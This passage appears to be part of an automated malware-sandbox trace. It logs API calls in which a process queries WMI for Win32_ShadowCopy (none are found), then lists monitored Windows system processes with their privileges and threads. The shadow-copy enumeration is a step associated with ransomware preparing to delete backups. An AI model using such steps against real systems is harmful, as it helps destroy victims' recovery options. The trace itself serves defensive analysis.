0x2fc990 [0126.526] SysStringLen (param_1="\\\\") returned 0x2 [0126.526] SysStringLen (param_1="XDUWTFONO") returned 0x9 [0126.526] malloc (_Size=0x18) returned 0x2fc9b0 [0126.526] SysStringLen (param_1="\\\\XDUWTFONO") returned 0xb [0126.526] SysStringLen (param_1="\\") returned 0x1 [0126.526] malloc (_Size=0x18) returned 0x2fc9f0 [0126.526] SysStringLen (param_1="\\\\XDUWTFONO\\") returned 0xc [0126.526] SysStringLen (param_1="ROOT\\CIMV2") returned 0xa [0126.526] free (_Block=0x2fc9b0) [0126.526] free (_Block=0x2fc990) [0126.526] free (_Block=0x2fc970) [0126.526] free (_Block=0x2fc950) [0126.526] free (_Block=0x2fc8b0) [0126.526] free (_Block=0x2fc9d0) [0126.526] malloc (_Size=0x18) returned 0x2fc9d0 [0126.527] malloc (_Size=0x18) returned 0x2fc8b0 [0126.527] malloc (_Size=0x18) returned 0x2fc950 [0126.527] WbemLocator:IWbemLocator:ConnectServer (in: This=0x1b91390, strNetworkResource="\\\\XDUWTFONO\\ROOT\\CIMV2", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0xff4229d0 | out: ppNamespace=0xff4229d0*=0x1ba3c18) returned 0x0 [0126.532] free (_Block=0x2fc950) [0126.532] free (_Block=0x2fc8b0) [0126.532] free (_Block=0x2fc9d0) [0126.533] CoSetProxyBlanket (pProxy=0x1ba3c18, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0126.533] free (_Block=0x2fc9f0) [0126.533] ??1CHString@@QEAA@XZ () returned 0x7fef927482c [0126.533] ??0CHString@@QEAA@XZ () returned 0x16f780 [0126.533] GetCurrentThreadId () returned 0x6d8 [0126.533] malloc (_Size=0x18) returned 0x2fc9f0 [0126.533] lstrlenA (lpString="") returned 0 [0126.533] malloc (_Size=0x2) returned 0x17dfb0 [0126.533] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xff3b314c, cbMultiByte=-1, lpWideCharStr=0x17dfb0, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0126.533] free (_Block=0x17dfb0) [0126.533] SysStringLen (param_1="SELECT * FROM Win32_ShadowCopy") returned 0x1e [0126.533] SysStringLen (param_1="") returned 0x0 [0126.533] free (_Block=0x2fc9f0) [0126.533] malloc (_Size=0x18) returned 0x2fc9f0 [0126.534] IWbemServices:ExecQuery (in: This=0x1ba3c18, strQueryLanguage="WQL", strQuery="SELECT * FROM Win32_ShadowCopy", lFlags=0, pCtx=0x0, ppEnum=0x16f788 | out: ppEnum=0x16f788*=0x1ba3d18) returned 0x0 [0127.055] free (_Block=0x2fc9f0) [0127.055] CoSetProxyBlanket (pProxy=0x1ba3d18, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0127.059] IEnumWbemClassObject:Next (in: This=0x1ba3d18, lTimeout=-1, uCount=0x1, apObjects=0x16f790, puReturned=0x16f7a0 | out: apObjects=0x16f790*=0x0, puReturned=0x16f7a0*=0x0) returned 0x1 [0127.060] IUnknown:Release (This=0x1ba3d18) returned 0x0 [0127.061] ??1CHString@@QEAA@XZ () returned 0x7fef927482c [0127.061] free (_Block=0x2fc930) [0127.061] free (_Block=0x2fc8d0) [0127.061] GetCurrentThreadId () returned 0x6d8 [0127.061] ??0CHString@@QEAA@PEBG@Z () returned 0x16f968 [0127.062] ??YCHString@@QEAAAEBV0@PEBG@Z () returned 0x16f968 [0127.062] malloc (_Size=0x800) returned 0x2fcb60 [0127.062] LoadStringW (in: hInstance=0x0, uID=0xb3bc, lpBuffer=0x2fcb60, cchBufferMax=1024 | out: lpBuffer="No Instance(s) Available.\r\n") returned 0x1b [0127.062] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="No Instance(s) Available.\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0127.062] malloc (_Size=0x1c) returned 0x2fcae0 [0127.062] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="No Instance(s) Available.\r\n", cchWideChar=-1, lpMultiByteStr=0x2fcae0, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="No Instance(s) Available.\r\n", lpUsedDefaultChar=0x0) returned 28 [0127.062] fprintf (in: _File=0x7fefdf72ab0, _Format="%s" | out: _File=0x7fefdf72ab0) returned 27 [0127.062] fflush (in: _File=0x7fefdf72ab0 | out: _File=0x7fefdf72ab0) returned 0 [0127.062] free (_Block=0x2fcae0) [0127.062] free (_Block=0x2fcb60) [0127.063] ??1CHString@@QEAA@XZ () returned 0x3a186b01 [0127.063] WbemLocator:IUnknown:Release (This=0x1ba3c18) returned 0x0 [0127.063] ?Empty@CHString@@QEAAXXZ () returned 0x7fef927482c [0127.063] _kbhit () returned 0x0 [0127.065] free (_Block=0x2fcac0) [0127.065] free (_Block=0x2fc7d0) [0127.065] free (_Block=0x2fc7b0) [0127.066] free (_Block=0x2fc790) [0127.066] free (_Block=0x2fc770) [0127.066] free (_Block=0x2f6e80) [0127.066] free (_Block=0x2fc870) [0127.066] free (_Block=0x2f8600) [0127.066] free (_Block=0x2fc8f0) [0127.066] free (_Block=0x2fca40) [0127.066] free (_Block=0x2fc890) [0127.066] free (_Block=0x2fc910) [0127.066] free (_Block=0x2f6e10) [0127.066] free (_Block=0x2f6cf0) [0127.066] free (_Block=0x2fca90) [0127.066] ?Empty@CHString@@QEAAXXZ () returned 0x7fef927482c [0127.066] free (_Block=0x2f6eb0) [0127.066] free (_Block=0x2fc810) [0127.066] free (_Block=0x2fc830) [0127.066] free (_Block=0x2f63c0) [0127.066] free (_Block=0x2f6410) [0127.066] free (_Block=0x2f6460) [0127.066] free (_Block=0x2fc7f0) [0127.066] free (_Block=0x2f7fb0) [0127.066] free (_Block=0x2f6cd0) [0127.066] free (_Block=0x2f8040) [0127.066] free (_Block=0x2f68b0) [0127.066] free (_Block=0x2f8000) [0127.066] free (_Block=0x2f6850) [0127.066] free (_Block=0x2f6870) [0127.066] free (_Block=0x2f6730) [0127.066] free (_Block=0x2f6750) [0127.067] free (_Block=0x2f66d0) [0127.067] free (_Block=0x2f66f0) [0127.067] free (_Block=0x2f6790) [0127.067] free (_Block=0x2f67b0) [0127.067] free (_Block=0x2f67f0) [0127.067] free (_Block=0x2f6810) [0127.067] free (_Block=0x2f6610) [0127.067] free (_Block=0x2f6630) [0127.067] free (_Block=0x2f65b0) [0127.067] free (_Block=0x2f65d0) [0127.067] free (_Block=0x2f6670) [0127.067] free (_Block=0x2f6690) [0127.067] free (_Block=0x2f6550) [0127.067] free (_Block=0x2f6570) [0127.067] free (_Block=0x2f64e0) [0127.067] free (_Block=0x2f64b0) [0127.067] free (_Block=0x2f6d80) [0127.067] WbemLocator:IUnknown:Release (This=0x1b91390) returned 0x2 [0127.067] WbemLocator:IUnknown:Release (This=0x1ba3b28) returned 0x0 [0127.068] WbemLocator:IUnknown:Release (This=0x1ba3a98) returned 0x0 [0127.069] WbemLocator:IUnknown:Release (This=0x1b91390) returned 0x1 [0127.069] ?Empty@CHString@@QEAAXXZ () returned 0x7fef927482c [0127.069] WbemLocator:IUnknown:Release (This=0x1b91390) returned 0x0 [0127.069] free (_Block=0x2fc6f0) [0127.069] free (_Block=0x2fc710) [0127.069] free (_Block=0x2f8540) [0127.069] free (_Block=0x2fc730) [0127.069] free (_Block=0x2fc750) [0127.069] free (_Block=0x2f8580) [0127.070] free (_Block=0x2fc570) [0127.070] free (_Block=0x2fc590) [0127.070] free (_Block=0x2f83c0) [0127.070] free (_Block=0x2fc5b0) [0127.070] free (_Block=0x2fc5d0) [0127.070] free (_Block=0x2f8400) [0127.070] free (_Block=0x2fc4f0) [0127.070] free (_Block=0x2fc510) [0127.070] free (_Block=0x2f8340) [0127.070] free (_Block=0x2fc530) [0127.070] free (_Block=0x2fc550) [0127.070] free (_Block=0x2f8380) [0127.070] free (_Block=0x2fc670) [0127.070] free (_Block=0x2fc690) [0127.070] free (_Block=0x2f84c0) [0127.070] free (_Block=0x2fc6b0) [0127.070] free (_Block=0x2fc6d0) [0127.070] free (_Block=0x2f8500) [0127.070] free (_Block=0x2fc470) [0127.070] free (_Block=0x2fc490) [0127.070] free (_Block=0x2f82c0) [0127.070] free (_Block=0x2fc4b0) [0127.071] free (_Block=0x2fc4d0) [0127.071] free (_Block=0x2f8300) [0127.071] free (_Block=0x2fc5f0) [0127.071] free (_Block=0x2fc610) [0127.071] free (_Block=0x2f8440) [0127.071] free (_Block=0x2fc630) [0127.071] free (_Block=0x2fc650) [0127.071] free (_Block=0x2f8480) [0127.071] free (_Block=0x2fc3b0) [0127.071] free (_Block=0x2fc3d0) [0127.071] free (_Block=0x2f8200) [0127.071] free (_Block=0x2fc270) [0127.071] free (_Block=0x2fc290) [0127.071] free (_Block=0x2f80c0) [0127.071] free (_Block=0x2f6d40) [0127.071] free (_Block=0x2f6d60) [0127.071] free (_Block=0x2f8080) [0127.071] free (_Block=0x2fc2f0) [0127.071] free (_Block=0x2fc310) [0127.071] free (_Block=0x2f8140) [0127.072] free (_Block=0x2fc3f0) [0127.072] free (_Block=0x2fc410) [0127.072] free (_Block=0x2f8240) [0127.072] free (_Block=0x2fc2b0) [0127.072] free (_Block=0x2fc2d0) [0127.072] free (_Block=0x2f8100) [0127.072] free (_Block=0x2fc330) [0127.072] free (_Block=0x2fc350) [0127.072] free (_Block=0x2f8180) [0127.072] free (_Block=0x2fc370) [0127.072] free (_Block=0x2fc390) [0127.072] free (_Block=0x2f81c0) [0127.072] free (_Block=0x2fc430) [0127.072] free (_Block=0x2fc450) [0127.072] free (_Block=0x2f8280) [0127.072] CoUninitialize () [0127.113] exit (_Code=0) [0127.113] free (_Block=0x2f85c0) [0127.113] free (_Block=0x2f7c40) [0127.113] ??1CHString@@QEAA@XZ () returned 0x7fef927482c [0127.113] free (_Block=0x2f6e30) [0127.113] free (_Block=0x2f6530) [0127.113] free (_Block=0x2f7c00) [0127.113] free (_Block=0x2f7bc0) [0127.113] free (_Block=0x2f7b70) [0127.113] free (_Block=0x2f7b30) [0127.113] free (_Block=0x2f5ac0) [0127.113] free (_Block=0x2f7ab0) [0127.113] free (_Block=0x2f5a80) [0127.113] ??1CHString@@QEAA@XZ () returned 0x7fef927482c [0127.113] free (_Block=0x2fc850) Thread: id = 79 os_tid = 0x91c Thread: id = 81 os_tid = 0x3b4 Thread: id = 82 os_tid = 0x138 Thread: id = 83 os_tid = 0x92c Thread: id = 84 os_tid = 0x93c Process: id = "13" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x971d000" os_pid = "0x370" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "rpc_server" parent_id = "12" os_parent_pid = "0x1d8" cmd_line = "C:\\Windows\\system32\\svchost.exe -k netsvcs" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xa], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\hkmsvc" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xa], "NT SERVICE\\LanmanServer" [0xa], "NT SERVICE\\MMCSS" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xa], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xa], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xa], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xa], "NT SERVICE\\wuauserv" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000d057" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 90 os_tid = 0x86c Thread: id = 91 os_tid = 0x85c Thread: id = 92 os_tid = 0x82c Thread: id = 93 os_tid = 0x124 Thread: id = 94 os_tid = 0x42c Thread: id = 95 os_tid = 0x1e4 Thread: id = 96 os_tid = 0x75c Thread: id = 97 os_tid = 0x6d0 Thread: id = 98 os_tid = 0x6bc Thread: id = 99 os_tid = 0x6b8 Thread: id = 100 os_tid = 0x6a8 Thread: id = 101 os_tid = 0x69c Thread: id = 102 os_tid = 0x698 Thread: id = 103 os_tid = 0x684 Thread: id = 104 os_tid = 0x678 Thread: id = 105 os_tid = 0x4a8 Thread: id = 106 os_tid = 0x46c Thread: id = 107 os_tid = 0x44c Thread: id = 108 os_tid = 0x424 Thread: id = 109 os_tid = 0x41c Thread: id = 110 os_tid = 0x404 Thread: id = 111 os_tid = 0x14c Thread: id = 112 os_tid = 0x158 Thread: id = 113 os_tid = 0x3fc Thread: id = 114 os_tid = 0x3f4 Thread: id = 115 os_tid = 0x3e8 Thread: id = 116 os_tid = 0x39c Thread: id = 117 os_tid = 0x390 Thread: id = 118 os_tid = 0x388 Thread: id = 119 os_tid = 0x37c Thread: id = 120 os_tid = 0x374 Thread: id = 134 os_tid = 0x330 Thread: id = 135 os_tid = 0x38c Thread: id = 136 os_tid = 0x760 Thread: id = 137 os_tid = 0x98c Thread: id = 138 os_tid = 0x2ac Process: id = "14" image_name = "wmiprvse.exe" filename = "c:\\windows\\system32\\wbem\\wmiprvse.exe" page_root = "0x61a6a000" os_pid = "0xa64" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "rpc_server" parent_id = "13" os_parent_pid = "0x250" cmd_line = "C:\\Windows\\system32\\wbem\\wmiprvse.exe -secured -Embedding" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Network Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "WMI (Network Service)" [0xf], "NT AUTHORITY\\Logon Session 00000000:000449f3" [0xc000000f] Thread: id = 121 os_tid = 0x83c Thread: id = 122 os_tid = 0xa80 Thread: id = 123 os_tid = 0xa7c Thread: id = 124 os_tid = 0xa78 Thread: id = 125 os_tid = 0xa6c Thread: id = 126 os_tid = 0xa68 Thread: id = 139 os_tid = 0x2dc Process: id = "15" image_name = "wmiprvse.exe" filename = "c:\\windows\\system32\\wbem\\wmiprvse.exe" page_root = "0x61f65000" os_pid = "0xa34" os_integrity_level = "0x4000" os_privileges = "0xe60b1e990" monitor_reason = "rpc_server" parent_id = "13" os_parent_pid = "0x250" cmd_line = "C:\\Windows\\system32\\wbem\\wmiprvse.exe -Embedding" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xa], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\hkmsvc" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xe], "NT SERVICE\\LanmanServer" [0xe], "NT SERVICE\\MMCSS" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xe], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xe], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xe], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xe], "NT SERVICE\\wuauserv" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000d057" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 127 os_tid = 0x84c Thread: id = 128 os_tid = 0xa54 Thread: id = 129 os_tid = 0xa50 Thread: id = 130 os_tid = 0xa4c Thread: id = 131 os_tid = 0xa48 Thread: id = 132 os_tid = 0xa3c Thread: id = 133 os_tid = 0xa38 Thread: id = 142 os_tid = 0x97c Process: id = "16" image_name = "System" filename = "" page_root = "0x187000" os_pid = "0x4" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "kernel_analysis" parent_id = "0" os_parent_pid = "0xffffffffffffffff" cmd_line = "" cur_dir = "" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Thread: id = 145 os_tid = 0x8 Thread: id = 146 os_tid = 0x5c Thread: id = 147 os_tid = 0x24 Thread: id = 148 os_tid = 0x90 Thread: id = 149 os_tid = 0x9c Thread: id = 150 os_tid = 0x78 Thread: id = 151 os_tid = 0xc0 Thread: id = 152 os_tid = 0x28 Thread: id = 153 os_tid = 0x40 Thread: id = 154 os_tid = 0x4c Thread: id = 155 os_tid = 0x44 Thread: id = 156 os_tid = 0x3c Thread: id = 157 os_tid = 0xb4 Thread: id = 158 os_tid = 0xc4 Thread: id = 159 os_tid = 0xcc Thread: id = 160 os_tid = 0xd0 Thread: id = 161 os_tid = 0xb8 Thread: id = 162 os_tid = 0x38 Thread: id = 163 os_tid = 0xd4 Thread: id = 164 os_tid = 0xd8 Thread: id = 165 os_tid = 0xdc Thread: id = 168 os_tid = 0x34 Thread: id = 169 os_tid = 0x30 Thread: id = 170 os_tid = 0x48 Thread: id = 171 os_tid = 0xe8 Thread: id = 172 os_tid = 0xf4 Thread: id = 174 os_tid = 0x64 Thread: id = 175 os_tid = 0x2c Thread: id = 176 os_tid = 0x100 Thread: id = 177 os_tid = 0x104 Thread: id = 178 os_tid = 0x10c Thread: id = 179 os_tid = 0x110 Thread: id = 180 os_tid = 0x114 Thread: id = 181 os_tid = 0x80 Thread: id = 182 os_tid = 0x98 Thread: id = 183 os_tid = 0x8c Thread: id = 184 os_tid = 0x118 Thread: id = 185 os_tid = 0x108 Thread: id = 186 os_tid = 0x84 Thread: id = 190 os_tid = 0x130 Thread: id = 191 os_tid = 0x134 Thread: id = 192 os_tid = 0x138 Thread: id = 193 os_tid = 0x13c Thread: id = 194 os_tid = 0xb0 Thread: id = 208 os_tid = 0x60 Thread: id = 212 os_tid = 0x190 Thread: id = 220 os_tid = 0x68 Thread: id = 237 os_tid = 0x88 Thread: id = 265 os_tid = 0x74 Thread: id = 270 os_tid = 0x280 Thread: id = 297 os_tid = 0x2f4 Thread: id = 303 os_tid = 0x50 Thread: id = 306 os_tid = 0x314 Thread: id = 309 os_tid = 0xbc Thread: id = 351 os_tid = 0x3d4 Thread: id = 383 os_tid = 0x208 Thread: id = 389 os_tid = 0x20 Thread: id = 424 os_tid = 0x478 Thread: id = 453 os_tid = 0x4f8 Thread: id = 458 os_tid = 0x480 Thread: id = 462 os_tid = 0x47c Thread: id = 464 os_tid = 0x51c Thread: id = 468 os_tid = 0x52c Thread: id = 494 os_tid = 0x59c Thread: id = 495 os_tid = 0x5a0 Thread: id = 513 os_tid = 0xa0 Thread: id = 514 os_tid = 0x5e4 Thread: id = 516 os_tid = 0x5ec Thread: id = 518 os_tid = 0x5f4 Thread: id = 519 os_tid = 0x5f8 Thread: id = 521 os_tid = 0x600 Thread: id = 522 os_tid = 0x604 Thread: id = 531 os_tid = 0x630 Thread: id = 554 os_tid = 0x1c Thread: id = 582 os_tid = 0x94 Thread: id = 595 os_tid = 0x740 Process: id = "17" image_name = "smss.exe" filename = "c:\\windows\\system32\\smss.exe" page_root = "0x188ca000" os_pid = "0xe0" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "16" os_parent_pid = "0x4" cmd_line = "\\SystemRoot\\System32\\smss.exe" cur_dir = "C:\\Windows" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Thread: id = 166 os_tid = 0xe4 Thread: id = 167 os_tid = 0xec Thread: id = 187 os_tid = 0x11c Thread: id = 199 os_tid = 0x160 Process: id = "18" image_name = "autochk.exe" filename = "c:\\windows\\system32\\autochk.exe" page_root = "0x2c705000" os_pid = "0xf8" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "17" os_parent_pid = "0xe0" cmd_line = "\\??\\C:\\Windows\\system32\\autochk.exe *" cur_dir = "C:\\Windows\\system32" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Thread: id = 173 os_tid = 0xfc Process: id = "19" image_name = "smss.exe" filename = "c:\\windows\\system32\\smss.exe" page_root = "0x1025d000" os_pid = "0x120" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "17" os_parent_pid = "0xe0" cmd_line = "\\SystemRoot\\System32\\smss.exe 00000000 0000003c " cur_dir = "C:\\Windows\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Thread: id = 188 os_tid = 0x124 Process: id = "20" image_name = "csrss.exe" filename = "c:\\windows\\system32\\csrss.exe" page_root = "0x2c834000" os_pid = "0x128" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "19" os_parent_pid = "0x120" cmd_line = "%SystemRoot%\\system32\\csrss.exe ObjectDirectory=\\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16" cur_dir = "C:\\Windows\\system32" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Thread: id = 189 os_tid = 0x12c Thread: id = 195 os_tid = 0x140 Thread: id = 196 os_tid = 0x144 Thread: id = 197 os_tid = 0x148 Thread: id = 198 os_tid = 0x14c Thread: id = 202 os_tid = 0x16c Thread: id = 213 os_tid = 0x194 Thread: id = 214 os_tid = 0x198 Thread: id = 218 os_tid = 0x1b0 Thread: id = 222 os_tid = 0x1d0 Process: id = "21" image_name = "smss.exe" filename = "c:\\windows\\system32\\smss.exe" page_root = "0x2c563000" os_pid = "0x150" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "17" os_parent_pid = "0xe0" cmd_line = "\\SystemRoot\\System32\\smss.exe 00000001 0000003c " cur_dir = "C:\\Windows\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Thread: id = 200 os_tid = 0x154 Process: id = "22" image_name = "wininit.exe" filename = "c:\\windows\\system32\\wininit.exe" page_root = "0x2c53a000" os_pid = "0x158" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "19" os_parent_pid = "0x120" cmd_line = "wininit.exe" cur_dir = "C:\\Windows\\system32" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Thread: id = 201 os_tid = 0x15c Thread: id = 209 os_tid = 0x188 Thread: id = 210 os_tid = 0x18c Thread: id = 215 os_tid = 0x19c Thread: id = 216 os_tid = 0x1a0 Thread: id = 217 os_tid = 0x1ac Thread: id = 233 os_tid = 0x1f4 Thread: id = 283 os_tid = 0x2c4 Process: id = "23" image_name = "csrss.exe" filename = "c:\\windows\\system32\\csrss.exe" page_root = "0x2c25c000" os_pid = "0x164" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "21" os_parent_pid = "0x150" cmd_line = "%SystemRoot%\\system32\\csrss.exe ObjectDirectory=\\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16" cur_dir = "C:\\Windows\\system32" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Thread: id = 203 os_tid = 0x168 Thread: id = 204 os_tid = 0x170 Thread: id = 205 os_tid = 0x174 Thread: id = 206 os_tid = 0x178 Thread: id = 207 os_tid = 0x17c Thread: id = 219 os_tid = 0x1b4 Thread: id = 228 os_tid = 0x1dc Thread: id = 229 os_tid = 0x1e0 Process: id = "24" image_name = "winlogon.exe" filename = "c:\\windows\\system32\\winlogon.exe" page_root = "0x1a762000" os_pid = "0x180" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "21" os_parent_pid = "0x150" cmd_line = "winlogon.exe" cur_dir = "C:\\Windows\\system32" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Thread: id = 211 os_tid = 0x184 Thread: id = 223 os_tid = 0x1d4 Thread: id = 224 os_tid = 0x1d8 Thread: id = 287 os_tid = 0x2d0 Thread: id = 299 os_tid = 0x300 Thread: id = 364 os_tid = 0x100 Thread: id = 365 os_tid = 0x110 Thread: id = 370 os_tid = 0x130 Process: id = "25" image_name = "services.exe" filename = "c:\\windows\\system32\\services.exe" page_root = "0xf560000" os_pid = "0x1a4" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "22" os_parent_pid = "0x158" cmd_line = "C:\\Windows\\system32\\services.exe" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Thread: id = 221 os_tid = 0x1a8 Thread: id = 242 os_tid = 0x210 Thread: id = 243 os_tid = 0x214 Thread: id = 244 os_tid = 0x218 Thread: id = 245 os_tid = 0x21c Thread: id = 246 os_tid = 0x220 Thread: id = 247 os_tid = 0x224 Thread: id = 248 os_tid = 0x228 Thread: id = 249 os_tid = 0x22c Thread: id = 250 os_tid = 0x230 Thread: id = 251 os_tid = 0x234 Thread: id = 252 os_tid = 0x238 Thread: id = 253 os_tid = 0x23c Thread: id = 269 os_tid = 0x27c Thread: id = 366 os_tid = 0x114 Thread: id = 426 os_tid = 0x48c Thread: id = 436 os_tid = 0x4bc Thread: id = 438 os_tid = 0x4c4 Process: id = "26" image_name = "werfault.exe" filename = "c:\\windows\\system32\\werfault.exe" page_root = "0x19f73000" os_pid = "0x1b8" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "22" os_parent_pid = "0x158" cmd_line = "C:\\Windows\\system32\\WerFault.exe -k -c " cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Thread: id = 225 os_tid = 0x1bc Thread: id = 256 os_tid = 0x24c Thread: id = 465 os_tid = 0x520 Thread: id = 466 os_tid = 0x524 Process: id = "27" image_name = "lsass.exe" filename = "c:\\windows\\system32\\lsass.exe" page_root = "0xde7b000" os_pid = "0x1c0" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "22" os_parent_pid = "0x158" cmd_line = "C:\\Windows\\system32\\lsass.exe" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Thread: id = 226 os_tid = 0x1c4 Thread: id = 230 os_tid = 0x1e4 Thread: id = 231 os_tid = 0x1e8 Thread: id = 232 os_tid = 0x1ec Thread: id = 234 os_tid = 0x1f0 Thread: id = 235 os_tid = 0x1f8 Thread: id = 236 os_tid = 0x1fc Thread: id = 238 os_tid = 0x200 Thread: id = 